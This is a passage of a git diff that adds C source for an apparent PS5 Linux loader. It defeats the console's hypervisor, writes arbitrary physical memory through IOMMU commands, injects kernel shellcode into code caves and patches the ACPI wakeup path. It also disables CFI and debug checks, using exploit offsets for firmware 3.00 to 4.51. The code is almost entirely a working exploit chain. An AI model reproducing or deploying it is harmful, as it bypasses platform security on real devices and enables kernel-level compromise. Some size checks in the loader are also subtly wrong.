*cmd) { + + if (iommu->mmio_va == 0) + iommu_init(); + + uint64_t curr_tail = kread64(iommu->mmio_va + IOMMU_MMIO_CB_TAIL); + uint64_t next_tail = (curr_tail + IOMMU_CMD_ENTRY_SIZE) & IOMMU_CB_MASK; + + kwrite(iommu->cb2_base + curr_tail, (void *)cmd, IOMMU_CMD_ENTRY_SIZE); + kwrite64(iommu->mmio_va + IOMMU_MMIO_CB_TAIL, next_tail); + + while (kread64(iommu->mmio_va + IOMMU_MMIO_CB_HEAD) != + kread64(iommu->mmio_va + IOMMU_MMIO_CB_TAIL)) + ; +} + +// Write 8 bytes to a physical address using IOMMU completion wait store +void iommu_write8_pa(uint64_t pa, uint64_t val) { + uint32_t cmd[4]; + cmd[0] = (uint32_t)(pa & 0xFFFFFFF8) | 0x05; + cmd[1] = ((uint32_t)(pa >> 32) & 0xFFFFF) | 0x10000000; + cmd[2] = (uint32_t)(val); + cmd[3] = (uint32_t)(val >> 32); + iommu_submit_cmd(cmd); +} + +// Write 4 bytes to a physical address +void iommu_write4_pa(uint64_t pa, uint32_t val) { + uint64_t aligned = pa & ~7ULL; + uint64_t existing = kread64(dmap + aligned); + uint32_t off = (uint32_t)(pa & 7); + memcpy((uint8_t *)&existing + off, &val, 4); + iommu_write8_pa(aligned, existing); +} + +// Write arbitrary length to a physical address in 8-byte chunks +void iommu_write_pa(uint64_t pa, const void *data, uint32_t len) { + const uint8_t *src = (const uint8_t *)data; + uint32_t off = 0; + + if (pa & 7) { + uint32_t head = 8 - (uint32_t)(pa & 7); + if (head > len) + head = len; + uint64_t aligned = pa & ~7ULL; + uint64_t existing = kread64(dmap + aligned); + memcpy((uint8_t *)&existing + (pa & 7), src, head); + iommu_write8_pa(aligned, existing); + off += head; + } + + while (off + 8 <= len) { + uint64_t val; + memcpy(&val, src + off, 8); + iommu_write8_pa(pa + off, val); + off += 8; + } + + if (off < len) { + uint64_t aligned = pa + off; + uint64_t existing = kread64(dmap + aligned); + memcpy(&existing, src + off, len - off); + iommu_write8_pa(aligned, existing); + } +} \ No newline at end of file diff --git a/source/loader.c b/source/loader.c new file mode 100644 index 0000000..e4ab277 --- /dev/null +++ b/source/loader.c @@ -0,0 +1,242 @@ +#include "loader.h" +#include "config.h" +#include "utils.h" +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MINI_SYSCORE_PID 1 + +static uint64_t alloc_page(void) { + + void *page = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANONYMOUS, -1, 0); + + // Fault it to force physical allocation + *(uint8_t *)page = 0; + + return va_to_pa_user((uintptr_t)page); +} + +static void install_page(uintptr_t pml4, vm_offset_t va, vm_paddr_t pa, + int bits) { + uint64_t entry; + + uintptr_t pml4e = pml4 + pmap_pml4e_index(va) * 8; + entry = kread64(pml4e); + if (!PAGE_P(entry)) { + uint64_t page = alloc_page(); + entry = page | PG_B_RW | PG_B_P | bits; + kwrite64(pml4e, entry); + } + + uintptr_t pdpe = pa_to_dmap(PAGE_PA(entry)) + pmap_pdpe_index(va) * 8; + entry = kread64(pdpe); + if (!(entry & PG_B_P)) { + uint64_t page = alloc_page(); + entry = page | PG_B_RW | PG_B_P | bits; + kwrite64(pdpe, entry); + } + + uintptr_t pde = pa_to_dmap(PAGE_PA(entry)) + pmap_pde_index(va) * 8; + entry = kread64(pde); + if (!(entry & PG_B_P)) { + uint64_t page = alloc_page(); + entry = page | PG_B_RW | PG_B_P | bits; + kwrite64(pde, entry); + } + + uintptr_t pte = pa_to_dmap(PAGE_PA(entry)) + pmap_pte_index(va) * 8; + entry = pa | PG_B_RW | PG_B_P | bits; + pte_store(pte, entry); +} + +void pte_store(uintptr_t ptep, uint64_t pte) { + + static_assert((PAGE_SIZE % 0x1000) == 0, + "PAGE_SIZE should be a multiple of 0x1000"); + + for (uint64_t i = 0; i < (PAGE_SIZE / 0x1000); i++) { + kwrite64(ptep + i * 8, pte + i * 0x1000); + } +} + +const char *file_paths[] = { + "/mnt/usb0/", "/mnt/usb1/", "/mnt/usb2/", + "/mnt/usb3/", "/mnt/usb0/PS5/Linux/", "/mnt/usb1/PS5/Linux/", + "/mnt/usb2/PS5/Linux/", "/mnt/usb3/PS5/Linux/", +}; + +long find_and_get_size_of_file(const char *filename, char *found_path) { + + char full_path[256]; + struct stat st; + + int num_paths = sizeof(file_paths) / sizeof(file_paths[0]); + + for (int i = 0; i < num_paths; i++) { + + snprintf(full_path, sizeof(full_path), "%s%s", file_paths[i], filename); + + if (stat(full_path, &st) == 0) { + printf("File '%s' found in '%s'\n", filename, file_paths[i]); + strcpy(found_path, full_path); + return st.st_size; + } + } + + return -1; +} + +static int find_and_read_file(const char *filename, void *buf, size_t bufsize) { + char full_path[256]; + struct stat st; + + int num_paths = sizeof(file_paths) / sizeof(file_paths[0]); + + for (int i = 0; i < num_paths; i++) { + + snprintf(full_path, sizeof(full_path), "%s%s", file_paths[i], filename); + + if (stat(full_path, &st) == 0) { + printf("File '%s' found in '%s'\n", filename, file_paths[i]); + return read_file(full_path, buf, bufsize); + } + } + + return -1; +} + +static int read_file(const char *path, void *buf, size_t bufsize) { + int fd = open(path, O_RDONLY); + if (fd < 0) + return fd; + int r = read(fd, buf, bufsize); + close(fd); + return r; +} + +static void trim_newline(char *s) { + while (*s != '\0') { + if (*s == '\r' || *s == '\n') { + *s = '\0'; + break; + } + s++; + } +} + +int fetch_linux(struct linux_info *info) { + uintptr_t self_pmap = getpmap(kernel_get_proc(getpid())); + uintptr_t self_pml4 = kread64(self_pmap + 0x20); + + uintptr_t syscore_pmap = getpmap(kernel_get_proc(MINI_SYSCORE_PID)); + uintptr_t syscore_pml4 = kread64(syscore_pmap + 0x20); + + char bzimage_path[256]; + char initrd_path[256]; + + size_t bzimage_size = find_and_get_size_of_file("bzImage", bzimage_path); + if (bzimage_size < 0) { + printf("File bzImage not found at default paths - Aborting\n"); + return -1; + } + + void *bzimage = + mmap(NULL, ALIGN_UP(bzimage_size, 0x1000), PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANONYMOUS, -1, 0); + if (bzimage == MAP_FAILED) { + printf("[-] Error could not allocate bzimage.\n"); + return -1; + } + + bzimage_size = + read_file(bzimage_path, bzimage, ALIGN_UP(bzimage_size, 0x1000)); + if (bzimage_size < 0) { + printf("Something went wrong while reading bzImage - Aborting\n"); + return -1; + } + + size_t initrd_size = find_and_get_size_of_file("initrd.img", initrd_path); + if (bzimage_size < 0) { + printf("File bzImage not found at default paths - Aborting\n"); + return -1; + } + + void *initrd = + mmap(NULL, ALIGN_UP(initrd_size, 0x1000), PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANONYMOUS, -1, 0); + if (initrd == MAP_FAILED) { + printf("[-] Error could not allocate initrd.\n"); + return -1; + } + + initrd_size = read_file(initrd_path, initrd, ALIGN_UP(initrd_size, 0x1000)); + if (initrd_size < 0) { + printf("Something went wrong while reading initrd - Aborting\n"); + return -1; + } + + size_t vram_size; + char buf_vram[16] = {}; + int ret = find_and_read_file("vram.txt", buf_vram, sizeof(buf_vram) - 1); + if (ret < 0) { + printf( + "File vram.txt not found at default paths - Using static fallback\n"); + vram_size = VRAM_SIZE; + } else { + trim_newline(buf_vram); + vram_size = strtoull(buf_vram, NULL, 16); + if (vram_size == 0) { + printf("Seems like the configured vram value is wrong - Using static " + "fallback\n"); + vram_size = VRAM_SIZE; + } + } + + char cmdline[2048] = {}; + ret = find_and_read_file("cmdline.txt", cmdline, sizeof(cmdline) - 1); + if (ret < 0) { + printf("File cmdline.txt not found at default paths - Using static " + "fallback\n"); + strcpy(cmdline, CMD_LINE); + } else { + trim_newline(cmdline); + } + + info->linux_info = kernel_cave_linux_info; + info->bzimage = kernel_cave_bzImage; + info->bzimage_size = bzimage_size; + info->initrd = kernel_cave_bzImage + ALIGN_UP(bzimage_size, PAGE_SIZE); + info->initrd_size = initrd_size; + info->vram_size = vram_size; + strcpy(info->cmdline, cmdline); + + uint64_t page = alloc_page(); + kwrite(pa_to_dmap(page), info, sizeof(struct linux_info)); + install_page(syscore_pml4, kernel_cave_linux_info, page, 0); + + for (int i = 0; i < bzimage_size; i += PAGE_SIZE) { + install_page(syscore_pml4, info->bzimage + i, + va_to_pa_user((uintptr_t)bzimage + i), 0); + } + + for (int i = 0; i < initrd_size; i += PAGE_SIZE) { + install_page(syscore_pml4, info->initrd + i, + va_to_pa_user((uintptr_t)initrd + i), 0); + } + + return 0; +} diff --git a/source/main.c b/source/main.c new file mode 100644 index 0000000..d5ef32a --- /dev/null +++ b/source/main.c @@ -0,0 +1,175 @@ +#include "main.h" +#include "../shellcode_kernel/shellcode_kernel.h" +#include "hv_defeat.h" +#include "loader.h" +#include "offsets.h" +#include "utils.h" +#include +#include + +int main(void) { + + if (setup_env()) { + printf("Something went wrong while initiating.\nPlease make sure your fw " + "is supported."); + return -1; + } + if (hv_defeat()) { + printf("Something went wrong while defeating Hypervisor.\nPlease make sure " + "your fw is supported."); + return -1; + } + + if (fetch_linux(&linux_i)) { + printf("Something went wrong while installing linux files.\n"); + return -1; + } + + if (prepare_resume()) { + printf("Something went wrong while preparing resume.\n"); + return -1; + } + + printf("Everything done. Go to rest mode, wait for the orange light to stop " + "blinking and then wakeup to Linux :)\n"); + + while (1) { + sleep(30); + } + + return 0; +} + +int setup_env(void) { + printf("Welcome to ps5-linux-loader. We'll defeat HV and prepare the system " + "to boot Linux on sleep resume.\n"); + if (set_offsets()) + return -1; + if (init_global_vars()) + return -1; + return 0; +} + +int prepare_resume(void) { + + if (env_offset.KERNEL_CODE_CAVE == 0) { + printf("Error: missing code cave offset\n"); + return -1; + } + + if (env_offset.KERNEL_DATA_CAVE == 0) { + printf("Error: missing data cave offset\n"); + return -1; + } + + printf("\nWriting Shell Code for WakeUp path and patching " + "AcpiSetFirmwareWakingVector in acpi_wakeup_machdep\n"); + + uint64_t dest_text = ktext + env_offset.KERNEL_CODE_CAVE; + uint64_t dest_data = + ktext + env_offset.KERNEL_DATA_CAVE; // For arguments only, rest of .data + // variables are in shellcode + + uint64_t sz = shellcode_kernel_text_len; + + uint32_t CHUNK = 0x1000; + uint64_t written = 0; + while (written < sz) { + uint32_t n = (sz - written > CHUNK) ? CHUNK : (uint32_t)(sz - written); + kernel_copyin(&shellcode_kernel_text[written], dest_text + written, n); + written += n; + } + DEBUG_PRINT(" copied %d bytes to text cave\n", sz); + + DEBUG_PRINT("\n\nI wrote this shellcode text on %016lx (ktext+%08lx):\n", + dest_text, env_offset.KERNEL_CODE_CAVE); + for (uint64_t i = 0; i < sz; i++) { + DEBUG_PRINT("%02x", kread8(dest_text + i)); + } + DEBUG_PRINT("\n\n"); + + shellcode_kernel_args args; + + // Fill structure of ShellCode Arguments + args.fw_version = kernel_get_fw_version() & 0xFFFF0000; + args.ktext = ktext; + args.kdata = kdata; + args.dmap_base = dmap; + + args.fun_printf = ktext + env_offset.FUN_PRINTF; + args.fun_va_to_pa = ktext + env_offset.FUN_VA_TO_PA; + args.fun_hv_iommu_set_buffers = ktext + env_offset.FUN_HV_IOMMU_SET_BUFFERS; + args.fun_hv_iommu_wait_completion = + ktext + env_offset.FUN_HV_IOMM_WAIT_COMPLETION; + args.fun_smp_rendezvous = ktext + env_offset.FUN_SMP_RENDEZVOUS; + args.fun_smp_no_rendevous_barrier = + ktext + env_offset.FUN_SMP_NO_RENDEVOUS_BARRIER; + args.g_vbios = ktext + env_offset.G_VBIOS; + + args.fun_transmitter_control = ktext + env_offset.FUN_TRANSMITTER_CONTROL; + args.fun_mp3_initialize = ktext + env_offset.FUN_MP3_INITIALIZE; + args.fun_mp3_invoke = ktext + env_offset.FUN_MP3_INVOKE; + + args.iommu_mmio_va = iommu->mmio_va; + args.iommu_cb2_va = iommu->cb2_base; + args.iommu_cb3_va = iommu->cb3_base; + args.iommu_eb_va = iommu->eb_base; + memcpy(&args.vmcb[0], &vmcb_pa[0], sizeof(args.vmcb[0]) * 16); + + args.kernel_uart_override = ktext + env_offset.KERNEL_UART_OVERRIDE; + args.hv_handle_vmexit_pa = env_offset.HV_HANDLE_VMEXIT_PA; + args.hv_code_cave_pa = env_offset.HV_CODE_CAVE_PA; + args.hv_uart_override_pa = env_offset.HV_UART_OVERRIDE_PA; + + args.linux_info_va = linux_i.linux_info; // To relocate by kernel shellcode + // bzimage_va and initrd_va are passed in the linux_info structure + + // Copy arguments to small .data cave + kernel_copyin(&args, dest_data, sizeof(args)); + + DEBUG_PRINT("\n\nI wrote this arguments data on %016lx (ktext+%08lx):\n", + dest_data, env_offset.KERNEL_DATA_CAVE); + for (uint64_t i = 0; i < sz; i++) { + DEBUG_PRINT("%02x", kread8(dest_data + i)); + } + DEBUG_PRINT("\n\n"); + + // Now find the address 0x11AA11AA11AA11AA used as marker for args_ptr and + // overwrite it with proper VA in .data for arguments + int offset = -1; + for (int i = 0; i < 0x40; i++) { + if (*(uint64_t *)((uint64_t)shellcode_kernel_text + i) == + 0x11AA11AA11AA11AA) { + offset = i; + break; + } + } + if (offset == -1) { + printf("Could not find offset of args_ptr address - Aborting\n"); + } + kwrite64(dest_text + offset, dest_data); + + DEBUG_PRINT("\n\nI wrote this ptr %016lx on %016lx (offset %08lx)\n", + dest_data, dest_text + offset, offset); + + uint64_t instr_to_patch = + ktext + env_offset.HOOK_ACPI_WAKEUP_MACHDEP; // AcpiSetFirmwareWakingVector + // in acpi_wakeup_machdep + int64_t diff_call = dest_text - instr_to_patch; + uint8_t new_instr[5]; + new_instr[0] = 0xE8; // Call Near + *((uint32_t *)&new_instr[1]) = + (int32_t)(diff_call - 5); // Call Offset is relative to the next + // instruction and Call uses 5 bytes + + // Patch instruction + kernel_copyin(new_instr, instr_to_patch, 5); + DEBUG_PRINT("Instruction patched\n"); + + // Patch debug exception + kwrite8(ktext + env_offset.KERNEL_DEBUG_PATCH, 0xC3); + // Patch cfi_check + kwrite8(ktext + env_offset.KERNEL_CFI_CHECK, 0xC3); + + return 0; +} \ No newline at end of file diff --git a/source/offsets.c b/source/offsets.c new file mode 100644 index 0000000..75280af --- /dev/null +++ b/source/offsets.c @@ -0,0 +1,298 @@ +#include "offsets.h" + +offset_list off_0300 = { + .PMAP_STORE = 0x3D8E218, + .HV_BSS_OFF = 0x16000, + .HV_VCPU_ARRAY_OFF = 0x5D0, + .HV_VCPU_STRIDE = 0x320, + .HV_VCPU_VMCB_PTR = 0x08, + .KERNEL_CODE_CAVE = 0x0043000, + .KERNEL_DATA_CAVE = 0x0043000 + 0xBBE300, + .IOMMU_SOFTC = 0x33175E0, + .VMSPACE_VM_VMID = 0x1E4, + .VMSPACE_VM_PMAP = 0x1D0, + .PMAP_PM_PML4 = 0x020, + .PMAP_PM_CR3 = 0x028, + .DATA_BASE_GVMSPACE = 0x06423F80, + .HOOK_ACPI_WAKEUP_MACHDEP = 0x0390E59, + .FUN_PRINTF = 0x048B9A0, + .FUN_VA_TO_PA = 0x0831410, + .FUN_HV_IOMMU_SET_BUFFERS = 0x0B33E20, + .FUN_HV_IOMM_WAIT_COMPLETION = 0x0B33D50, + .FUN_SMP_RENDEZVOUS = 0x0A3E850, + .FUN_SMP_NO_RENDEVOUS_BARRIER = 0x0287E50, + .HV_HANDLE_VMEXIT_PA = 0x6282CBCB, + .HV_CODE_CAVE_PA = 0x62806F00, + .HV_UART_OVERRIDE_PA = 0x62800008, + .G_VBIOS = 0x0734B5D0, + .FUN_TRANSMITTER_CONTROL = 0x0B2A560, + .FUN_MP3_INITIALIZE = 0x0953890, + .FUN_MP3_INVOKE = 0x0952670, + .KERNEL_UART_OVERRIDE = 0x1EB0258, + .KERNEL_DEBUG_PATCH = 0x0752460, + .KERNEL_CFI_CHECK = 0x0441DD0, +}; + +offset_list off_0310 = { + .PMAP_STORE = 0x3D8E218, + .HV_BSS_OFF = 0x16000, + .HV_VCPU_ARRAY_OFF = 0x5D0, + .HV_VCPU_STRIDE = 0x320, + .HV_VCPU_VMCB_PTR = 0x08, + .KERNEL_CODE_CAVE = 0x0043000, + .KERNEL_DATA_CAVE = 0x0043000 + 0xBBE300, + .IOMMU_SOFTC = 0x33175E0, + .VMSPACE_VM_VMID = 0x1E4, + .VMSPACE_VM_PMAP = 0x1D0, + .PMAP_PM_PML4 = 0x020, + .PMAP_PM_CR3 = 0x028, + .DATA_BASE_GVMSPACE = 0x06423F80, + .HOOK_ACPI_WAKEUP_MACHDEP = 0x0390ED5, + .FUN_PRINTF = 0x048B9E0, + .FUN_VA_TO_PA = 0x0831410, + .FUN_HV_IOMMU_SET_BUFFERS = 0x0B33E60, + .FUN_HV_IOMM_WAIT_COMPLETION = 0x0B33D90, + .FUN_SMP_RENDEZVOUS = 0x0A3E890, + .FUN_SMP_NO_RENDEVOUS_BARRIER = 0x0287EA8, + .HV_HANDLE_VMEXIT_PA = 0x6282CBCB, + .HV_CODE_CAVE_PA = 0x62806F00, + .HV_UART_OVERRIDE_PA = 0x62800008, + .G_VBIOS = 0x0734B5D0, + .FUN_TRANSMITTER_CONTROL = 0x0B2A5A0, + .FUN_MP3_INITIALIZE = 0x09538D0, + .FUN_MP3_INVOKE = 0x09526B0, + .KERNEL_UART_OVERRIDE = 0x1EB0258, + .KERNEL_DEBUG_PATCH = 0x07524A0, + .KERNEL_CFI_CHECK = 0x0441E10, +}; + +offset_list off_0320 = { + .PMAP_STORE = 0x3D8E218, + .HV_BSS_OFF = 0x16000, + .HV_VCPU_ARRAY_OFF = 0x5D0, + .HV_VCPU_STRIDE = 0x320, + .HV_VCPU_VMCB_PTR = 0x08, + .KERNEL_CODE_CAVE = 0x0043000, + .KERNEL_DATA_CAVE = 0x0043000 + 0xBBE300, + .IOMMU_SOFTC = 0x33175E0, + .VMSPACE_VM_VMID = 0x1E4, + .VMSPACE_VM_PMAP = 0x1D0, + .PMAP_PM_PML4 = 0x020, + .PMAP_PM_CR3 = 0x028, + .DATA_BASE_GVMSPACE = 0x06423F80, + .HOOK_ACPI_WAKEUP_MACHDEP = 0x391203, + .FUN_PRINTF = 0x48BD30, + .FUN_VA_TO_PA = 0x8317A0, + .FUN_HV_IOMMU_SET_BUFFERS = 0xB34320, + .FUN_HV_IOMM_WAIT_COMPLETION = 0xB34250, + .FUN_SMP_RENDEZVOUS = 0xA3ED50, + .FUN_SMP_NO_RENDEVOUS_BARRIER = 0x288230, + .HV_HANDLE_VMEXIT_PA = 0x6282CBCB, + .HV_CODE_CAVE_PA = 0x62806F00, + .HV_UART_OVERRIDE_PA = 0x62800008, + .G_VBIOS = 0x734B5D0, + .FUN_TRANSMITTER_CONTROL = 0xB2AA60, + .FUN_MP3_INITIALIZE = 0x953D30, + .FUN_MP3_INVOKE = 0x952B10, + .KERNEL_UART_OVERRIDE = 0x1EB0258, + .KERNEL_DEBUG_PATCH = 0x7527F0, + .KERNEL_CFI_CHECK = 0x442160, +}; + +offset_list off_0321 = { + .PMAP_STORE = 0x3D8E218, + .HV_BSS_OFF = 0x16000, + .HV_VCPU_ARRAY_OFF = 0x5D0, + .HV_VCPU_STRIDE = 0x320, + .HV_VCPU_VMCB_PTR = 0x08, + .KERNEL_CODE_CAVE = 0x0043000, + .KERNEL_DATA_CAVE = 0x0043000 + 0xBBE300, + .IOMMU_SOFTC = 0x33175E0, + .VMSPACE_VM_VMID = 0x1E4, + .VMSPACE_VM_PMAP = 0x1D0, + .PMAP_PM_PML4 = 0x020, + .PMAP_PM_CR3 = 0x028, + .DATA_BASE_GVMSPACE = 0x06423F80, + .HOOK_ACPI_WAKEUP_MACHDEP = 0x391203, + .FUN_PRINTF = 0x48BD30, + .FUN_VA_TO_PA = 0x8317A0, + .FUN_HV_IOMMU_SET_BUFFERS = 0xB34320, + .FUN_HV_IOMM_WAIT_COMPLETION = 0xB34250, + .FUN_SMP_RENDEZVOUS = 0xA3ED50, + .FUN_SMP_NO_RENDEVOUS_BARRIER = 0x288250, + .HV_HANDLE_VMEXIT_PA = 0x6282CBCB, + .HV_CODE_CAVE_PA = 0x62806F00, + .HV_UART_OVERRIDE_PA = 0x62800008, + .G_VBIOS = 0x734B5D0, + .FUN_TRANSMITTER_CONTROL = 0xB2AA60, + .FUN_MP3_INITIALIZE = 0x953D30, + .FUN_MP3_INVOKE = 0x952B10, + .KERNEL_UART_OVERRIDE = 0x1EB0258, + .KERNEL_DEBUG_PATCH = 0x7527F0, + .KERNEL_CFI_CHECK = 0x442160, +}; + +offset_list off_0400 = { + .PMAP_STORE = 0x3E57A78, + .HV_BSS_OFF = 0x14000, + .HV_VCPU_ARRAY_OFF = 0x5D0, + .HV_VCPU_STRIDE = 0x320, + .HV_VCPU_VMCB_PTR = 0x08, + .KERNEL_CODE_CAVE = 0x0043000, + .KERNEL_DATA_CAVE = 0x0043000 + 0xBBE300, + .IOMMU_SOFTC = 0x33C7680, + .VMSPACE_VM_VMID = 0x1E4, + .VMSPACE_VM_PMAP = 0x1D0, + .PMAP_PM_PML4 = 0x020, + .PMAP_PM_CR3 = 0x028, + .DATA_BASE_GVMSPACE = 0x064C3F80, + .HOOK_ACPI_WAKEUP_MACHDEP = 0x3A7613, + .FUN_PRINTF = 0x4A3240, + .FUN_VA_TO_PA = 0x85ADC0, + .FUN_HV_IOMMU_SET_BUFFERS = 0xB638F0, + .FUN_HV_IOMM_WAIT_COMPLETION = 0xB63830, + .FUN_SMP_RENDEZVOUS = 0xA6C920, + .FUN_SMP_NO_RENDEVOUS_BARRIER = 0x295488, + .HV_HANDLE_VMEXIT_PA = 0x6282B45D, + .HV_CODE_CAVE_PA = 0x62806F00, + .HV_UART_OVERRIDE_PA = 0x62800008, + .G_VBIOS = 0x72B7630, + .FUN_TRANSMITTER_CONTROL = 0xB5AD50, + .FUN_MP3_INITIALIZE = 0x9805C0, + .FUN_MP3_INVOKE = 0x97F3E0, + .KERNEL_UART_OVERRIDE = 0x1F522A8, + .KERNEL_DEBUG_PATCH = 0x77DA70, + .KERNEL_CFI_CHECK = 0x45A170, +}; + +offset_list off_0402 = { + .PMAP_STORE = 0x3E57A78, + .HV_BSS_OFF = 0x14000, + .HV_VCPU_ARRAY_OFF = 0x5D0, + .HV_VCPU_STRIDE = 0x320, + .HV_VCPU_VMCB_PTR = 0x08, + .KERNEL_CODE_CAVE = 0x0043000, + .KERNEL_DATA_CAVE = 0x0043000 + 0xBBE300, + .IOMMU_SOFTC = 0x33C7680, + .VMSPACE_VM_VMID = 0x1E4, + .VMSPACE_VM_PMAP = 0x1D0, + .PMAP_PM_PML4 = 0x020, + .PMAP_PM_CR3 = 0x028, + .DATA_BASE_GVMSPACE = 0x064C3F80, + .HOOK_ACPI_WAKEUP_MACHDEP = 0x3A7613, + .FUN_PRINTF = 0x4A3240, + .FUN_VA_TO_PA = 0x85AE10, + .FUN_HV_IOMMU_SET_BUFFERS = 0xB63950, + .FUN_HV_IOMM_WAIT_COMPLETION = 0xB63890, + .FUN_SMP_RENDEZVOUS = 0xA6C970, + .FUN_SMP_NO_RENDEVOUS_BARRIER = 0x29A018, + .HV_HANDLE_VMEXIT_PA = 0x6282B45D, + .HV_CODE_CAVE_PA = 0x62806F00, + .HV_UART_OVERRIDE_PA = 0x62800008, + .G_VBIOS = 0x72B7630, + .FUN_TRANSMITTER_CONTROL = 0xB5ADA0, + .FUN_MP3_INITIALIZE = 0x980610, + .FUN_MP3_INVOKE = 0x97F430, + .KERNEL_UART_OVERRIDE = 0x1F522A8, + .KERNEL_DEBUG_PATCH = 0x77DAC0, + .KERNEL_CFI_CHECK = 0x45A170, +}; + +offset_list off_0403 = { + .PMAP_STORE = 0x3E57A78, + .HV_BSS_OFF = 0x14000, + .HV_VCPU_ARRAY_OFF = 0x5D0, + .HV_VCPU_STRIDE = 0x320, + .HV_VCPU_VMCB_PTR = 0x08, + .KERNEL_CODE_CAVE = 0x0043000, + .KERNEL_DATA_CAVE = 0x0043000 + 0xBBE300, + .IOMMU_SOFTC = 0x33C7680, + .VMSPACE_VM_VMID = 0x1E4, + .VMSPACE_VM_PMAP = 0x1D0, + .PMAP_PM_PML4 = 0x020, + .PMAP_PM_CR3 = 0x028, + .DATA_BASE_GVMSPACE = 0x064C3F80, + .HOOK_ACPI_WAKEUP_MACHDEP = 0x3A7613, + .FUN_PRINTF = 0x4A3240, + .FUN_VA_TO_PA = 0x85AEA0, + .FUN_HV_IOMMU_SET_BUFFERS = 0xB639F0, + .FUN_HV_IOMM_WAIT_COMPLETION = 0xB63930, + .FUN_SMP_RENDEZVOUS = 0xA6CA00, + .FUN_SMP_NO_RENDEVOUS_BARRIER = 0x299F20, + .HV_HANDLE_VMEXIT_PA = 0x6282B45D, + .HV_CODE_CAVE_PA = 0x62806F00, + .HV_UART_OVERRIDE_PA = 0x62800008, + .G_VBIOS = 0x72B7630, + .FUN_TRANSMITTER_CONTROL = 0xB5AE30, + .FUN_MP3_INITIALIZE = 0x9806A0, + .FUN_MP3_INVOKE = 0x97F4C0, + .KERNEL_UART_OVERRIDE = 0x1F522A8, + .KERNEL_DEBUG_PATCH = 0x77DB50, + .KERNEL_CFI_CHECK = 0x45A170, +}; + +offset_list off_0450 = { + .PMAP_STORE = 0x3E57A78, + .HV_BSS_OFF = 0x14000, + .HV_VCPU_ARRAY_OFF = 0x5D0, + .HV_VCPU_STRIDE = 0x320, + .HV_VCPU_VMCB_PTR = 0x08, + .KERNEL_CODE_CAVE = 0x0043000, + .KERNEL_DATA_CAVE = 0x0043000 + 0xBBE300, + .IOMMU_SOFTC = 0x33C7680, + .VMSPACE_VM_VMID = 0x1E4, + .VMSPACE_VM_PMAP = 0x1D0, + .PMAP_PM_PML4 = 0x020, + .PMAP_PM_CR3 = 0x028, + .DATA_BASE_GVMSPACE = 0x064C3F80, + .HOOK_ACPI_WAKEUP_MACHDEP = 0x03A75E3, + .FUN_PRINTF = 0x04A3270, + .FUN_VA_TO_PA = 0x85AFF0, + .FUN_HV_IOMMU_SET_BUFFERS = 0xB63BB0, + .FUN_HV_IOMM_WAIT_COMPLETION = 0xB63AF0, + .FUN_SMP_RENDEZVOUS = 0xA6CBB0, + .FUN_SMP_NO_RENDEVOUS_BARRIER = 0x299FC0, + .HV_HANDLE_VMEXIT_PA = 0x6282B45D, + .HV_CODE_CAVE_PA = 0x62806F00, + .HV_UART_OVERRIDE_PA = 0x62800008, + .G_VBIOS = 0x72B7630, + .FUN_TRANSMITTER_CONTROL = 0xB5AFF0, + .FUN_MP3_INITIALIZE = 0x980850, + .FUN_MP3_INVOKE = 0x97F670, + .KERNEL_UART_OVERRIDE = 0x1F522A8, + .KERNEL_DEBUG_PATCH = 0x77DC80, + .KERNEL_CFI_CHECK = 0x45A1A0, +}; + +offset_list off_0451 = { + .PMAP_STORE = 0x3E57A78, + .HV_BSS_OFF = 0x14000, + .HV_VCPU_ARRAY_OFF = 0x5D0, + .HV_VCPU_STRIDE = 0x320, + .HV_VCPU_VMCB_PTR = 0x08, + .KERNEL_CODE_CAVE = 0x0043000, + .KERNEL_DATA_CAVE = 0x0043000 + 0xBBE300, + .IOMMU_SOFTC = 0x33C7680, + .VMSPACE_VM_VMID = 0x1E4, + .VMSPACE_VM_PMAP = 0x1D0, + .PMAP_PM_PML4 = 0x020, + .PMAP_PM_CR3 = 0x028, + .DATA_BASE_GVMSPACE = 0x64C3F80, + .HOOK_ACPI_WAKEUP_MACHDEP = 0x3A75E3, + .FUN_PRINTF = 0x4A3270, + .FUN_VA_TO_PA = 0x85B390, + .FUN_HV_IOMMU_SET_BUFFERS = 0xB63FE0, + .FUN_HV_IOMM_WAIT_COMPLETION = 0xB63F20, + .FUN_SMP_RENDEZVOUS = 0xA6CFE0, + .FUN_SMP_NO_RENDEVOUS_BARRIER = 0x299FA8, + .HV_HANDLE_VMEXIT_PA = 0x6282B45D, + .HV_CODE_CAVE_PA = 0x62806F00, + .HV_UART_OVERRIDE_PA = 0x62800008, + .G_VBIOS = 0x72B7630, + .FUN_TRANSMITTER_CONTROL = 0xB5B420, + .FUN_MP3_INITIALIZE = 0x980BF0, + .FUN_MP3_INVOKE = 0x97FA10, + .KERNEL_UART_OVERRIDE = 0x1F522A8, + .KERNEL_DEBUG_PATCH = 0x77DC90, + .KERNEL_CFI_CHECK = 0x45A1A0, +}; diff --git a/source/tmr.c b/source/tmr.c new file mode 100644 index 0000000..8adb242 --- /dev/null +++ b/source/tmr.c @@ -0,0 +1,12 @@ +#include "tmr.h" +#include "utils.h" + +uint32_t tmr_read(uint32_t addr) { + kwrite32(ECAM_B0D18F2 + TMR_INDEX_OFF, addr); + return kread32(ECAM_B0D18F2 + TMR_DATA_OFF); +} + +void tmr_write(uint32_t addr, uint32_t val) { + kwrite32(ECAM_B0D18F2 + TMR_INDEX_OFF, addr); + kwrite32(ECAM_B0D18F2 + TMR_DATA_OFF, val); +} \ No newline at end of file diff --git a/source/utils.c b/source/utils.c new file mode 100644 index 0000000..62f29aa --- /dev/null +++ b/source/utils.c @@ -0,0 +1,219 @@ +#include "utils.h" +#include "offsets.h" +#include +#include +#include +#include +#include +#include + +/* Global Variables */ +offset_list env_offset; +uint64_t ktext; +uint64_t kdata; +uint64_t dmap; +uint64_t cr3; +uint32_t fw; +struct linux_info linux_i; + +int set_offsets(void) { + fw = kernel_get_fw_version() >> 16; + if (fw == 0) + return -1; + switch (fw) { + case 0x0300: + env_offset = off_0300; + break; + case 0x0310: + env_offset = off_0310; + break; + case 0x0320: + env_offset = off_0320; + break; + case 0x0321: + env_offset = off_0321; + break; + case 0x0400: + env_offset = off_0400; + break; + case 0x0402: + env_offset = off_0402; + break; + case 0x0403: + env_offset = off_0403; + break; + case 0x0450: + env_offset = off_0450; + break; + case 0x0451: + env_offset = off_0451; + break; + default: + return -1; + } + return 